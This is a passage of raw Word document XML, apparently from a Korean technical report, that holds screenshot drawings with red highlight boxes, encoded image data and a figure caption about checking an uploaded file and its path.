                          <a:ext cx="1627620"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D1176" id="직사각형 1444394033" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:307.1pt;margin-top:34.3pt;width:128.15pt;height:14.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evuAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtuFDEQ3SNxB8t70j2fTJJWeqJRokFI&#10;URKRoKw9bnu6JbfL2J4fu3AHJG7AhgXnQuEOlN2fjELEAtELt+2qeuV69Tk929aKrIV1FeicDg5S&#10;SoTmUFR6mdMPd/M3x5Q4z3TBFGiR051w9Gz6+tXpxmRiCCWoQliCINplG5PT0nuTJYnjpaiZOwAj&#10;NAol2Jp5PNplUli2QfRaJcM0nSQbsIWxwIVzeHvRCOk04kspuL+W0glPVE7xbT6uNq6LsCbTU5Yt&#10;LTNlxdtnsH94Rc0qjU57qAvmGVnZ6g+ouuIWHEh/wKFOQMqKixgDRjNIn0VzWzIjYixIjjM9Te7/&#10;wfKr9Y0lVYG5G4/Ho5NxOhpRolmNuXr89vD4+fvPHw+/vn4he2LkbGNchqa35sa2J4fbQMBW2jr8&#10;MTSyjTzvep7F1hOOl4PJ8GgyxHRwlA2Oj9LRJCQiebI21vm3AmoSNjm1mMdIL1tfOt+odirBmYZ5&#10;pRTes0xpskHQk/QwjRYOVFUEaRA6u1ycK0vWDMthPk/xax3vqeEzlMbXhBibqOLO75RoHLwXEhnD&#10;OIaNh1CroodlnAvtB42oZIVovB3uO+ssYsxKI2BAlvjKHrsF6DQbkA67YaDVD6Yilnpv3Ib+N+Pe&#10;InoG7XvjutJgX4pMYVSt50a/I6mhJrC0gGKH9WShaTRn+LzCDF4y52+Yxc7CpOO08Ne4SAWYKWh3&#10;lJRgP710H/Sx4FFKyQY7Nafu44pZQYl6p7EVTrA0Q2vHw/jwKBSW3Zcs9iV6VZ8DZn+Ac8nwuA36&#10;XnVbaaG+x6EyC15RxDRH3znl3naHc99MEBxLXMxmUQ3b2TB/qW8ND+CB1VChd9t7Zk1bxh4b4Aq6&#10;rmbZs2pudIOlhtnKg6xiqT/x2vKNoyAWTju2wqzZP0etp+E6/Q0AAP//AwBQSwMEFAAGAAgAAAAh&#10;ABsXBZzfAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sbQRtVppOgIQQ&#10;aAcY4541WVutcaoma8vbY05ws+VPv7+/3CyuZ5MdQ+dRQbpKgFmsvemwUbD/fL6RwELUaHTv0Sr4&#10;tgE21eVFqQvjZ/yw0y42jEIwFFpBG+NQcB7q1jodVn6wSLejH52OtI4NN6OeKdz1XCRJxp3ukD60&#10;erBPra1Pu7NT8O5PR95/CfGWP76I/NXJuZm2Sl1fLQ/3wKJd4h8Mv/qkDhU5HfwZTWC9giy9FYTS&#10;IDNgBMg8uQN2ULCWKfCq5P8bVD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAnGgXr7gC&#10;AACkBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAGxcF&#10;nN8AAAAJAQAADwAAAAAAAAAAAAAAAAASBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251826176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13219A48" wp14:editId="3A89984F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1094855</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1176886</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1260764" cy="214745"/>
                <wp:effectExtent l="0" t="0" r="15875" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394031" name="직사각형 1444394031"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1260764" cy="214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00E8E" id="직사각형 1444394031" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:86.2pt;margin-top:92.65pt;width:99.25pt;height:16.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9HuAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDfppqWrbqqoVRBS&#10;VSpa1LPjtbMreT3Gdv64lXdA4g24cOC5UHkHxt6fRqXigMjBsXdmvpn55uf0bNsoshbW1aALOjpI&#10;KRGaQ1nrZUE/3M5fvabEeaZLpkCLgu6Eo2fTly9ONyYXY6hAlcISBNEu35iCVt6bPEkcr0TD3AEY&#10;oVEowTbM49Muk9KyDaI3Khmn6VGyAVsaC1w4h18vWiGdRnwpBffvpHTCE1VQjM3H08ZzEc5kesry&#10;pWWmqnkXBvuHKBpWa3Q6QF0wz8jK1n9ANTW34ED6Aw5NAlLWXMQcMJtR+iSbm4oZEXNBcpwZaHL/&#10;D5Zfra8tqUusXZZlhydZejiiRLMGa/Xw7f7h8/efP+5/ff1C9sTI2ca4HE1vzLXtXg6vgYCttE34&#10;x9TINvK8G3gWW084fhyNj9Ljo4wSjrLxKDvOJqEQyaO1sc6/EdCQcCmoxTpGetn60vlWtVcJzjTM&#10;a6XwO8uVJhv0cJJO0mjhQNVlkAahs8vFubJkzbAd5vMUf53jPTUMQ2mMJuTYZhVvfqdE6+C9kMgY&#10;5jFuPYReFQMs41xoP2pFFStF622y76y3iDkrjYABWWKUA3YH0Gu2ID12y0CnH0xFbPXBuEv9b8aD&#10;RfQM2g/GTa3BPpeZwqw6z61+T1JLTWBpAeUO+8lCO2jO8HmNFbxkzl8zi5OFM4jbwr/DQyrASkF3&#10;o6QC++m570EfGx6llGxwUgvqPq6YFZSotxpH4QRbM4x2fGST4zE+7L5ksS/Rq+YcsPrY5RhdvAZ9&#10;r/qrtNDc4VKZBa8oYpqj74Jyb/vHuW83CK4lLmazqIbjbJi/1DeGB/DAaujQ2+0ds6ZrY48DcAX9&#10;VLP8STe3usFSw2zlQdax1R957fjGVRAbp1tbYdfsv6PW43Kd/gYAAP//AwBQSwMEFAAGAAgAAAAh&#10;AJcMng/gAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyoExdIGuJUgIQQ&#10;FQtoy96Np0lUP6LYTcLfM6xgN1dzdOdMuZ6tYSMOofNOQrpIgKGrve5cI2G/e7nJgYWonFbGO5Tw&#10;jQHW1eVFqQrtJ/eJ4zY2jEpcKJSENsa+4DzULVoVFr5HR7ujH6yKFIeG60FNVG4NF0lyz63qHF1o&#10;VY/PLdan7dlK+PCnIzdfQmyyp1eRvdl8asZ3Ka+v5scHYBHn+AfDrz6pQ0VOB392OjBDORO3hNKQ&#10;3y2BEbHMkhWwgwSRrlLgVcn//1D9AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFZyP0e4&#10;AgAApAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJcM&#10;ng/gAAAACwEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00456990">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A63B5DC" wp14:editId="4BA4F0B4">
            <wp:extent cx="4572000" cy="1473081"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="12934671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7120" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId37"/>
                    <a:srcRect l="22470" t="40585" r="22975" b="26326"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="14730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4DBAC7" w14:textId="07EF00EA" w:rsidR="00BA7347" w:rsidRDefault="009073F7" w:rsidP="00BA7347">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="_Toc20909465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77</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>업로드된 파일</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>및 경로 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="35E07749" w14:textId="1511D738" w:rsidR="001A30C0" w:rsidRPr="001A30C0" w:rsidRDefault="001A30C0" w:rsidP="001A30C0"/>
    <w:p w14:paraId="1A069C51" w14:textId="410FE397" w:rsidR="00BA7347" w:rsidRDefault="004059CD" w:rsidP="00BA7347">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251881472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="199ADC1E" wp14:editId="11B319B6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2466109</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>47856</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2972777" cy="197486"/>
                <wp:effectExtent l="0" t="0" r="18415" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394035" name="직사각형 1444394035"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2972777" cy="1974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5ED15" id="직사각형 1444394035" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:194.2pt;margin-top:3.75pt;width:234.1pt;height:15.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0BuQIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG8mOHcdC5MBI4KJA&#10;kBhNiqxpirQEUCRL0pbdXXqHAr1BN130XEV6hw5JSTHSoIuiWlAkZ+YN583n7HxXC7RlxlZK5nhw&#10;lGLEJFVFJdc5/nC3eHOKkXVEFkQoyXK8Zxafz16/Omt0xoaqVKJgBgGItFmjc1w6p7MksbRkNbFH&#10;SjMJQq5MTRwczTopDGkAvRbJME1PkkaZQhtFmbVwexmFeBbwOWfU3XBumUMix/A2F1YT1pVfk9kZ&#10;ydaG6LKi7TPIP7yiJpUEpz3UJXEEbUz1B1RdUaOs4u6IqjpRnFeUhRggmkH6LJrbkmgWYgFyrO5p&#10;sv8Pll5vlwZVBeRuNBodT0fp8RgjSWrI1eO3h8fP33/+ePj19Qs6EANnjbYZmN7qpWlPFraegB03&#10;tf9DaGgXeN73PLOdQxQuh9PJcDKZYERBNphORqcnPhHJk7U21r1lqkZ+k2MDeQz0ku2VdVG1U/HO&#10;pFpUQsA9yYREjQdNx2mwsEpUhZd6oTXr1YUwaEugHBaLFL7W8YEaPENIeI2PMUYVdm4vWHTwnnFg&#10;zMcRPfhaZT0soZRJN4iikhQsehsfOussQsxCAqBH5vDKHrsF6DQjSIcdGWj1vSkLpd4bt6H/zbi3&#10;CJ6VdL1xXUllXopMQFSt56jfkRSp8SytVLGHejIqNprVdFFBBq+IdUtioLOgB2FauBtYuFCQKdXu&#10;MCqV+fTSvdeHggcpRg10ao7txw0xDCPxTkIrTKE0fWuHw2g8GcLBHEpWhxK5qS8UZH8Ac0nTsPX6&#10;TnRbblR9D0Nl7r2CiEgKvnNMnekOFy5OEBhLlM3nQQ3aWRN3JW819eCeVV+hd7t7YnRbxg4a4Fp1&#10;XU2yZ9Ucdb2lVPONU7wKpf7Ea8s3jIJQOO3Y8rPm8By0nobr7DcAAAD//wMAUEsDBBQABgAIAAAA&#10;IQAXvJSF3QAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSP0Ha5G4UYdAEyvEqQoS&#10;QkUcoMDdjbdJVHsdxW4S/r7uCY6rN5p5W65na9iIg+8cSbhbJsCQaqc7aiR8f73cCmA+KNLKOEIJ&#10;v+hhXS2uSlVoN9EnjrvQsFhCvlAS2hD6gnNft2iVX7oeKbKDG6wK8Rwargc1xXJreJokGbeqo7jQ&#10;qh6fW6yPu5OV8OGOB25+0vQtf3pN860VUzO+S3lzPW8egQWcw18YLvpRHarotHcn0p4ZCfdCPMSo&#10;hHwFLHKxyjJg+wvIgFcl//9AdQYAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDQpJ0BuQIA&#10;AKQFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAXvJSF&#10;3QAAAAgBAAAPAAAAAAAAAAAAAAAAABMFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004059CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FEDAC4B" wp14:editId="1EEE194F">
                <wp:extent cx="4572000" cy="1767328"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
                <wp:docPr id="46" name="그룹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72000" cy="1767328"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5996706" cy="2320062"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="47" name="그림 47"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill rotWithShape="1">
                          <a:blip r:embed="rId82">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect t="5019" r="48635" b="57573"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5996706" cy="2320062"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="48" name="그림 48"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill rotWithShape="1">
                          <a:blip r:embed="rId83" cstate="print">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect l="31843" t="2252" r="55072" b="88943"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1313225" y="91248"/>
                            <a:ext cx="607344" cy="171848"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="49" name="직사각형 49"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1120751" y="91248"/>
                            <a:ext cx="4724400" cy="183278"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="EDF2FB"/>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0" name="그림 50"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId84"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1158825" y="99642"/>
                            <a:ext cx="4701000" cy="135397"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7A95C9AA" id="그룹 3" o:spid="_x0000_s1026" style="width:5in;height:139.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59967,2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K/tNQQAAIENAAAOAAAAZHJzL2Uyb0RvYy54bWzcV82O2zYQvhfoOxC6&#10;Z61fyxbWG7S72UWBoF0kLXqmacoiIpECSf/sMXmHAr0XaC899NYW6BOl6Tt0hpRke51NtlukQHqw&#10;QFozw/n55hvq9PG2qcmaayOUnAXRSRgQLplaCLmcBd98ffloEhBjqVzQWkk+C264CR6fffrJ6aYt&#10;eKwqVS+4JmBEmmLTzoLK2rYYjQyreEPNiWq5hJel0g21sNXL0ULTDVhv6lEchuPRRulFqxXjxsC/&#10;F/5lcObslyVn9quyNNySehaAb9Y9tXvO8Tk6O6XFUtO2Eqxzgz7Ai4YKCYcOpi6opWSlxZGpRjCt&#10;jCrtCVPNSJWlYNzFANFE4a1orrRatS6WZbFZtkOaILW38vRgs+zL9bUmYjEL0nFAJG2gRq9//e3P&#10;H34nCSZn0y4LkLnS7fP2WvsIYflUsReGSHVeUbnkn5kWEg3lR43RbRXcL3f621I3aAdiJ1tXiJuh&#10;EHxrCYM/0yyH4kK9GLyL8nGexBNfKlZBPY/0WPWk08ym03EeQiioGScIkdh5RQt/sHNvcKcVrIBf&#10;l1lYHWX2/QgELbvSPOiMNPey0VD9YtU+AhC01Iq5qIW9cYCGcqNTcn0tGCYcN3tFyveL9OMfJM0x&#10;ul7Iq1AM6V0VOhQf4fbgvHkt2ktR10Qr+62w1fOKtoCLCHyjBb7sQoU+uoXDt2TLY/xCsVXDpfVN&#10;q3kNUStpKtGagOiCN3MOGNRfLByGaGE0ewaYwobNwmgKMoCKyTjJAgJ9m+VZ7uAJglZzyyoEHsbR&#10;u+5zYjrM3gdz70UOpFUbe8VVQ3AB3oKDLiV0/dRY9GAngpmqJT6NqsUCs+k2yGv8vNZkTYGR7Na3&#10;zIEUWEFNF44PwC0hOh8ULD4evAL970gF8er6GCuFoP4f4DUGqoEBZ6E/Wi2k9TTVwxdqnESTNHGT&#10;J44zkAYgZ1mYwwqAPJlM4SVA52FAjpIoAasBAbKbRrFPLi16Gh2HeZKmPYuCHy75gK++Hx4EaKkQ&#10;zR7udwJ108I8Nz1RwO6IKv7RyHIMBL2GZvfYEHjBo+vNTy/fvPr59S8v//r+O5JOMaOdKI6tbncH&#10;G0RRHOZZdFcS0zxO02EWTZI4/5dZPCQEvZwPdPDk4jK+/BydhxodiHkqOco8xuijcit7U3NPPM94&#10;CUMdJmnsCMpdp3a0QxkDKvZ0biq64J6NMhi57kaEp/dE5XypJRhEyyVUfrDdGeglvZHetg+ik0dV&#10;7m5jg3L4Lse88qDhTlbSDsqNkEq/zUANUXUne3lwfy81uJyrxQ1cebStz5W/FFLJKgVtyax2yigF&#10;2P342DaDG9MB28IfkI0PxLZYlQ98GTikxh0AWTdtu+HfDct7zf4oyiaTnjKn49TdDneUmeZwDR+6&#10;PcmSqbtg/Sec6a6mcM93Ldd9k+CHxP7e4Xn35XT2NwAAAP//AwBQSwMECgAAAAAAAAAhAPYSK6JD&#10;HQMAQx0DABQAAABkcnMvbWVkaWEvaW1hZ2UxLnBuZ4lQTkcNChoKAAAADUlIRFIAAAeAAAAD/AgG&#10;AAAApw2jbwAAAAFzUkdCAK7OHOkAAAAEZ0FNQQAAsY8L/GEFAAAACXBIWXMAABJ0AAASdAHeZh94&#10;AAD/pUlEQVR4Xuz9f3Bc132nDfYf+gPOvO8udmbeedkz3KUwcTzElrVb2BRrR0ipNkSNiivETIqQ&#10;HJltww7ZoiQKYiwalm2+Lc4qDCPZcFsjMy1KkWFmhjaYiJ6mY8YNy7KBRIwh25QEW7DctMwQdES7&#10;wZiyOhYltS1I+m6dc+/tvvfcc2/fBho/SD5P1VMy+/4699zTjaQ//T0n9YNzbwkiIiIiIiIiIiIi&#10;IiIiIl76pswXEBERERERERERERERERHx0pQAGBERERERERERERERERHxMpEAGBERERERERERERER&#10;ERHxMpEAGBERERERERERERERERHxMpEAGBERERERERERERERERHxMpEAGBERERERERERERERERHx&#10;MnFZAuDZnzv+8y/fRkRMpPrMMD9LEBERERERERERERERMd4lC4BVePPqr94WAIDFoMJg8/NlyXzx&#10;TfnBOXU99V/L9rrufnp/cxsiIiIiIiIiIiIiIuLK2fYAmOAXAJaCpQ2CVZhrvpZQfdxStg0RERER&#10;ERERERERETG5bQ2AVUADALBUqB+XMDU0IiIiIiIiIiIiIiJitG0LgAl/AWC5aEsIvNCK32Yu1XkR&#10;ERERERERERERERET2JYAmPAXAJYTVQlsfg614vOW19rpUp8fERERERERERERERExyrYEwAAAy81C&#10;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&#10;1T7+PlWv2SpmzSDVbJ/Cf5/mdi+09jC3e5jX8WP2o8I2hbN3Ha/y1ruWp3kOP+bzteEfp96/4/ox&#10;qgL4v/yX/yJ/+Zd/qf+3CoC3bNlS/7fixIkTct999/mOEPnxj3+sA2CFGQC3qwKYKaARERERERER&#10;EREREa9MkwS6l1sAbIa+5r+X2mULgL86/riezlkFvSr09fyjW9T6vrvk1jvukgMH/0Lvq0Knt956&#10;S6umib7n//enugJ4/PEnzNM2xR+sqTDNH8x64a8XYKoQz7/dDOAU5jnMfbxg0B8ImseY+IPMqBDT&#10;DIX91zCD0CjMKlM/Xhjux2y3eV8KM4g022nbR2H2tfeaee/+a5rbzXMq1PXN52Fex4/tnkz81/Xu&#10;xRY8+8/jBbjm+LBh6/sk/egPhBXqPGoKaH8AfPvtt9e3+/d74YUX9P++cOGC/M3f/E19mxkAt2MN&#10;YFvga3ttoRAAIyIiIiIiIiIiIiKuXpMEuv6A9F/9L/9raPulZFTYG/X6UrhsAfAvXn65HgB7lb8f&#10;3H6bEwTfslNuHbpLT/ns8cYbTuXhxN89qbepkFido1XMykovQFN6lbhe+Kb2iwpZPbwQLmofM6RT&#10;mEGqwqum9fSCvKgwV7